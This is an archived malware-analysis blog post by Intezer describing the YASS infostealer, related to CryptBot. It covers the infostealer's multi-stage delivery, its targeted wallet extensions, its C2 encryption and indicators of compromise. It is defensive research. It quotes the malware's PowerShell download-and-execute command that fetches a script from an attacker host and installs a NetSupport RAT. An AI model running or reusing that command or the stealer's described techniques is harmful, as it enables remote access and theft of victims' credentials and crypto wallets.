{
	"id": "2456b166-5a7f-4d88-9394-98bfa61e9f05",
	"created_at": "2026-04-06T00:21:19.13334Z",
	"updated_at": "2026-04-10T03:21:23.395699Z",
	"deleted_at": null,
	"sha1_hash": "7ef7e4aa8cbe87739b14a95d8ca85a03308db22a",
	"title": "There's Something About CryptBot: Yet Another Silly Stealer (YASS)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4596252,
	"plain_text": "There's Something About CryptBot: Yet Another Silly Stealer\r\n(YASS)\r\nBy Research Team\r\nPublished: 2024-09-10 · Archived: 2026-04-05 13:56:53 UTC\r\nWritten by Ryan Robinson and Joakim Kennedy \r\nRecently Intezer was investigating a file that we came across during alert triage. This particular file piqued our\r\ninterest due to the interesting delivery chain, and the even more interesting payload, an intricate infostealer.\r\nIntezer has amazing code genetic analysis technology, showing us overlaps of code reuse between different files,\r\nmalicious or not. We noticed that the payload did not have significant code overlap with other infostealers. Upon\r\nresearching the threat and pivoting to similar samples, we understand that other vendors are labeling this as\r\nCryptBot. While the similarities are undeniable, the differences in code are significant enough that this version\r\nwarrants its own documentation, and even its own name, Yet Another Silly Stealer (YASS). In this blog, we’ll\r\nhighlight both the parallels and the distinctions between these two infostealers, underscoring why this variant\r\ndemands attention. This blog will give a technical analysis of the delivery chain, as well as an analysis of the\r\nYASS payload. The stealer was delivered using a multi-stage downloader that we are calling MustardSandwich.\r\nThe cybersecurity landscape is constantly witnessing a wave in the creation of new and updated infostealers, with\r\nmalware developers continuously innovating to bypass defenses. While it may feel like a never-ending cat-and-mouse game, cataloging as many of these stealers as possible remains crucial. By doing so, we can better\r\nunderstand emerging tactics, enhance threat detection, and ultimately protect our sensitive data. 
Every new variant\r\ncataloged strengthens our defenses and helps to anticipate future threats, making the effort vital despite the\r\nrelentless pace of cybercriminal innovation.\r\nAttack Flow of new YASS infostealer, with some similarities and notable difference from Cryptbot\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 1 of 18\n\nMustard Sandwich Downloader\r\nIn the cases where we have identified the MustardSandwich downloader, it has been executed using a Windows\r\nshell link (LNK) file. The LNK file uses the Windows system binary forfiles.exe to invoke PowerShell which\r\ncalls mshta. An example of the command line arguments for one of the LNK files is shown below.\r\nLNK File Arguments\r\nThe LNK files are used to execute a Microsoft HTML application (HTA) using mshta. The malware abuses the\r\nlooseness of the mshta parser to hide the HTML within “junk” data. The HTML document has been broken up\r\ninto multiple parts and “sandwiched” between multiple copies of the same Windows binary. The screenshot below\r\nshows the output from binwalk of one of the files with annotations showing where the different parts of the\r\ndocument are located.\r\nBinwalk output of the EXE containing HTA\r\nThis technique provides some anti-analysis by automated solutions because most solutions will identify the file as\r\na Windows executable (PE). When the file is executed in a sandbox, nothing malicious will happen. To invoke the\r\nmalicious code, mshta must be used.\r\nThe downloader consists of two JScript stages and two PowerShell stages. The first PowerShell script is executed\r\nvia an ActiveXObject, as seen in the screenshot below.\r\nJScript Payload\r\nThe first PowerShell script decrypts the final stages. The stage has been encrypted using AES, and the key varies\r\nbetween attacks. 
An example of the stages is shown below.\r\nPowerShell Payload\r\nThe final stage is responsible for downloading the decoy and the malware to run on the machine. We have\r\nobserved two types of this stage, one that downloads multiple payloads and another that only downloads one\r\npayload.\r\nDecoy Video\r\nThe screenshot below shows a cleaned-up version of the “main” script function. First, it checks if the lure exists\r\non disk; if not, it’s downloaded and displayed to the user. This version also appears to be tracking installations by\r\nsending a simple web request to a separate URL. After the lure has been displayed to the user, the two payloads\r\nare downloaded and executed.\r\nPowerShell Downloading Additional Payloads\r\nThe URLs hosting the payloads have been obfuscated with simple logic. Each character in the string has been\r\nconverted to an integer and a constant has been added to each one. The function shown below is used to reverse\r\nthe obfuscation.\r\nDecoding Function\r\nThe payloads are downloaded as ZIP archives. The stage uses the function shown below to extract the content and\r\nexecute the payload. It’s worth noting that the function executes the first file from an alphabetic sort of the content\r\nof the archive.\r\nRunning First File in Archive\r\nThe simpler version of this stage, from a related chain, is shown below. It doesn’t expect the payloads to be stored\r\nin ZIP files, nor does it have the install tracking functionality.\r\nSimplified Version of Related Chain\r\nIDATLOADER\r\nInside the second downloaded ZIP file (L2.zip) is a single executable file. 
This is a Delphi file\r\n(4810333bf96fb808604f3657118c734c3dd8ee4baa3e6ffe8da548ae0c8e15d3) that contains a lot of boilerplate\r\ncode for Delphi visual components.\r\nIDATLOADER File\r\nThe code for starting IDATLoader is hidden amongst all the boilerplate code. IDATLOADER will inject\r\nshellcode into pla.dll that will then extract a PNG resource from the Delphi file and move it into the Temp folder.\r\nPNG Containing Payload\r\nFrom this PNG, the payload, a stealer, is extracted.\r\n(7ac46eb84f4b6d25601f23d2c30b7e80b6f3b2d82d3240234fc50af75290a29f)\r\nTechnical Analysis of Infostealer\r\nInitialisation\r\nYASS starts its operations by performing a sleep. Then the stealer will decrypt a block of strings that are used as\r\nglobal variables for the stealer’s functionality. There are two blocks of RC4 encrypted strings. A small key is\r\nhardcoded via stack strings in the binary for decryption. The two blocks contain the same strings, but one is\r\nwide char and the other is normal ASCII.\r\nDecrypted Strings\r\nThis block of strings contains important information such as C2 information, staging folders, persistence strings\r\nand functions to be dynamically resolved. The full list of decoded strings is located here.\r\nNext the stealer will fetch two environment variables.\r\nLocalAppData: Gives appdata/local path\r\nUserProfile: Gives path to user home\r\nThese variables are concatenated with two strings, in order to check for their presence.\r\nC:\\Users\\[username]\\AppData\\Local\\Gabatepi\r\nC:\\Users\\admin\\Desktop\\Invoice.docx\r\nThe malware will exit if either exists at this point. The first path is the location of a folder, seemingly used as a\r\nmutex to ensure only one running instance. The latter appears to be an anti-sandbox check. 
\r\nIf the staging folder does not exist, the stealer will not exit, and will create this directory.\r\nFolder used as Mutex\r\nBefore stealing activities begin, the stealer will generate a unique user ID, ZIP it, and send it to the C2.\r\nLocation of Sensitive Data\r\nYASS starts its stealing activities by locating directories where sensitive data is commonly held. It starts a\r\nrecursive search from the user profile path:\r\nC:\\Users\\[username]\r\nThe stealer will iterate over each file. The file path is compared against a very large hard-coded list of\r\ndirectories. The directories cover many categories, including programming, gaming, messaging, cloud storage,\r\nOffice products, torrent, utilities, and antivirus.\r\nSnippet of Targeted Directories\r\nIf there is a directory match, the stealer will check for the folder:\r\nLocal Extension Settings\r\nIf this is the current folder, the stealer will identify folders related to targeted Opera and Google Chrome\r\nextensions. 
\r\nCheck for Browser Extensions\r\nTargeted Extensions:\r\nExtension Product\r\nnkbihfbeogaeaoehlefnkodbefgpgknn MetaMask\r\nejbalbakoplchlghecdalmeeeajnimhm MetaMask\r\nljfoeinjpaedjfecbmggjgodbgkmjkjk MetaMask\r\nbfnaelmomeimhlpmgjnjophhpkkoljpa Phantom\r\nibnejdfjmmkpcnlpebklmnkoeoihofec TronLink\r\nfhbohimaelbohpjbbldcngcnapndodjp BNB Chain Wallet\r\njnlgamecbpmbajjfhmmmlhejkemejdma Braavos\r\ndlcobpjiigpikoobohmabehhmhfoodbb Argent X\r\nfnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet\r\nafbcbjpbpfadlkmhmclhkeeodmamcflc Math Wallet\r\nfhilaheimglignddkjgofkcbgekhenbh Oxygen\r\nffnbelfdoeiohenkjibnmadjiehjhajb Yoroi\r\nmopnmbcafieddcagagdcbnhejhlodfdd Polkadot\r\nbhhhlbepdkbapadjdnnojkbgioiodbic Solflare Wallet\r\nopcgpfmipidbgpenhmajoajpbobppdil Sui Wallet\r\nnngceckbapebfimnlniiiahkandclblb Bitwarden\r\nhdokiejnpimakedhajhdlcegeplioahd LastPass\r\nkkpllkodjeloidieedojogacfhpaihoh Enkrypt Wallet\r\nacmacodkjbdgmoleebolmdjonilkdbch Rabby Wallet\r\ngaedmjdfmmahhbjefcbgaolhhanlaolb Authy\r\nhifafgmccdpekplomjjkcfgodnhcellj Crypto.com\r\nklnaejjgbibmhlephnhpmaofohgkpgkd ZilPay\r\naholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3 Wallet\r\negjidjbpglichdcondbcbdnbeeppgdph Trust Wallet\r\nefbglgofoippbgcjepnhiblaibcnclgk Martian\r\nmcohilncbfahbmgdjkbpemcciiolgcge OKX Wallet\r\nbhghoamapcdpbohphigoooaddinpkbai Authenticator\r\naflkmfhebedbjioipglgcbcmnbpgliof Backpack\r\nidnnbdplmphpflfnlkomgpfbpcgelopg Xverse Wallet\r\nppbibelpcjmhbdihakflkdcoccbgbkpo UniSat Wallet\r\nomaabbefbmiijedngplfjmnooppbclkk Tonkeeper\r\nlgmpcpglpngdoalbgeoldeajfclnhafa SafePal Extension Wallet\r\ndmkamcknogkgcdfhhbddcghachkejeap Keplr\r\nookjlbkiijinhpmnjffcofjonbfbgaoc Temple Tezos Wallet\r\nnlbmnnijcnlegkjjpcfjclmcfggfefdm 
MyEtherWallet\r\ncjelfplplebdjjenllpjcblmjkfcffne Jaxx Liberty\r\nhpglfhgfnhbgpjdenjgmdgoeiappafln Guarda\r\nfhmfendgdocmcbmfikdcogofphimnkno Sollet\r\nimloifkgjagghnncjkhggdhalmcnfklk Trezor Password Manager\r\nThe stealer also searches for other more generic folders that might hold sensitive browser and wallet information.\r\nThe stealer will look for references to login data, cookies, web data, user data, backups and wallets. Brave browser\r\nand Telegram are also targeted.\r\nTargeted Files\r\nThe stolen files are built up into a structured ZIP file, along with a log of the stolen files and a screenshot of the\r\nvictim machine, before being exfiltrated.\r\nExfiltrated Data Structure\r\nThe directories in the exfiltrated ZIP file are structured in a way to help the recipient threat actor better navigate\r\nthe stolen data. The main categories are:\r\nApps\r\nBrowsers\r\nFiles\r\nWallets\r\nThe infostealer has an optional auxiliary method of stealing. YASS can iterate through a number of hardcoded\r\ndrives and look for files which it considers the “Other” category, sending them to a different server from the main\r\nactivities. This may be used to attempt to collect miscellaneous files to run parsers through at a later stage.\r\nAdditional Stealing Method\r\nInformation Gathering\r\nYASS will gather information about the infected computer to send to the C2. The information is\r\ngathered mainly from the registry or through Windows API calls. Information includes localized information\r\nabout the machine such as username and language, as well as physical aspects such as the processor, RAM, and\r\nGPU. This is collated into a text file before being sent to the C2. 
\r\nCompleted Fingerprint TXT File\r\nC2 Communication\r\nYASS communicates with the C2 via HTTP POST requests. All information and stolen files are first collected and\r\npackaged into a ZIP file. Before the ZIP file is sent to the C2, it is encrypted via RC4 using an interesting\r\ntechnique. YASS will generate a unique key for each file sent.\r\nThe unique key is a concatenation of a key from the decrypted block of strings and a dynamically generated key\r\nthat is unique with each POST request. In order for the server to be able to decrypt the data, the latter half of the\r\nRC4 key is shared through the filename metadata of the form data. This increases resistance to decryption of the\r\nstolen data by unauthorized parties, and also makes detection harder for defenders as there are no discernible\r\npatterns on which to build network signatures.\r\nFormat of RC4 Encryption Key\r\nYASS does not expect any specific reply from the server. The server will reply “OK” when it receives information\r\nfrom the stealer.\r\nNetSupport Client\r\nThe stealer also has the ability to drop the NetSupport Client as a backdoor for the infected machine. The client is\r\ndeployed via a PowerShell command and script.\r\n/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command \"$Resp = Invoke-WebRequest -\r\nUri 'https://brewdogebar[.]com/code.vue' -UseBasicParsing -UserAgent 'Mozilla/5.0\r\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0\r\nSafari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr\"\r\nThe PowerShell command reaches out to a server to download an additional script. The PowerShell script\r\ndownloads components for the NetSupport remote access tool, with a configuration file. 
The script also sets\r\npersistence and informs the server if target crypto wallet folders are detected.\r\nPowerShell Script Downloading NetSupport\r\nCryptBot – CryptNot – CryptWhat?!\r\nOver the years CryptBot has been under continuous development. The modifications of CryptBot have been\r\ndocumented in other blogs, particularly by AhnLab [1,2]. Much like the Ship of Theseus, this infostealer\r\nchallenges the essence of identity. Though its code has been entirely replaced compared to its original versions,\r\nthe behavioral echoes are unmistakable, pointing to the same malware developer behind it. With this in mind, we\r\nwish to talk about some of the similarities and differences.\r\nInitial Triage Showing Unknown Code\r\nWhen we first came across this file, we did not see any significant code overlap with any other known\r\nstealers. There is a notable overlap in targeted software with other stealers, particularly LummaC2. Another\r\nsimilarity with LummaC2 is the use of ZIP files and a one-way command and control server.\r\nThe strings share many overlaps with other stealers. This would be quite expected, as competing malware\r\ndevelopers would be able to see what folders or applications their competitors are targeting and add those paths to\r\ntheir own stealing mechanisms. YASS shares strings with Vidar, AMOS, ImBetter, RedLine, Sharp, Arkei, Atomic,\r\nand SolarMarker.\r\nRelated Strings\r\nWhile YASS uses techniques similar to CryptBot, the implementation is different. 
The shared techniques with\r\nCryptBot include:\r\nUse of a folder as a mutex\r\nExfil server using a “.top” TLD.\r\nStealing SQLite database files instead of querying the data.\r\nSimilar system information report structure.\r\nSimilar POST request to the exfil server.\r\nShared strings\r\nSecondary exfil server\r\nAdditional payload deployment\r\nEven though we see these similarities, we aren’t comfortable classifying YASS as just a newer version of\r\nCryptBot. There are also some significant differences. This stealer doesn’t have a well-structured configuration,\r\nuses a different encryption scheme, and has hardcoded functionality, via PowerShell, to download and install the\r\nNetSupport client. Many of the format strings look very similar but use different specifiers: the produced strings\r\nlook the same, but the “implementation” is different. YASS also has some unused strings that are used by\r\nCryptBot. It’s as if all the code has been rewritten, and a few strings have been forgotten and left behind, much like\r\nvestigial organs.\r\nWe can’t tell if the strings have been planted so that YASS imitates CryptBot as much as\r\npossible. It is not the first time we have come across malware that imitates other malware. So are we seeing an\r\nattempt to deflect suspicion towards malware that’s in hot water? In April 2023, the United States District\r\nCourt for the Southern District of New York unsealed a complaint filed by Google against some distributors and the\r\ncreator of CryptBot, so making your infostealer appear as CryptBot may keep a target off your back. The\r\nalternative is a “Ship of Theseus”. 
Either way, we are happy to present CryptBot’s latest step-sibling: YASS.\r\nIOCs\r\nLNK file\r\ne3bf61f6f96d1a121a1f7f47188cd36fc51f4565ca8cd8fc07207e56a038e7ca\r\nHTA (EXE)\r\nfd7654c5bb79652bc0db2696da35497b9aff2c783ec4c83705d33d329dc742d8\r\nhttps://nextomax.b-cdn[.]net/nexto (Hosting Server)\r\nhttps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png (Pinged by PowerShell Script)\r\nZIP\r\nb2080e7705283fce7e03c8895977c5e8c451b5f8a6eb3faecb8acb986a1587c6\r\nhttps://nextomax.b-cdn[.]net/L2.zip (Hosting Server)\r\nIDATLOADER\r\n4810333bf96fb808604f3657118c734c3dd8ee4baa3e6ffe8da548ae0c8e15d3\r\nYASS (Stealer)\r\n7ac46eb84f4b6d25601f23d2c30b7e80b6f3b2d82d3240234fc50af75290a29f (Unpacked from IDATLOADER)\r\nrceight8sr[.]top\r\ngrabios[.]org\r\nNetSupport RAT\r\nbrewdogebar[.]com (Hosting Server)\r\nenotik5050[.]com\r\nbarsuk5050[.]com\r\n94.232.244[.]133\r\nSource: https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/"
	],
	"report_names": [
		"cryptbot-yet-another-silly-stealer-yass"
	],
	"threat_actors": [],
	"ts_created_at": 1775434879,
	"ts_updated_at": 1775791283,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7ef7e4aa8cbe87739b14a95d8ca85a03308db22a.pdf",
		"text": "https://archive.orkl.eu/7ef7e4aa8cbe87739b14a95d8ca85a03308db22a.txt",
		"img": "https://archive.orkl.eu/7ef7e4aa8cbe87739b14a95d8ca85a03308db22a.jpg"
	}
}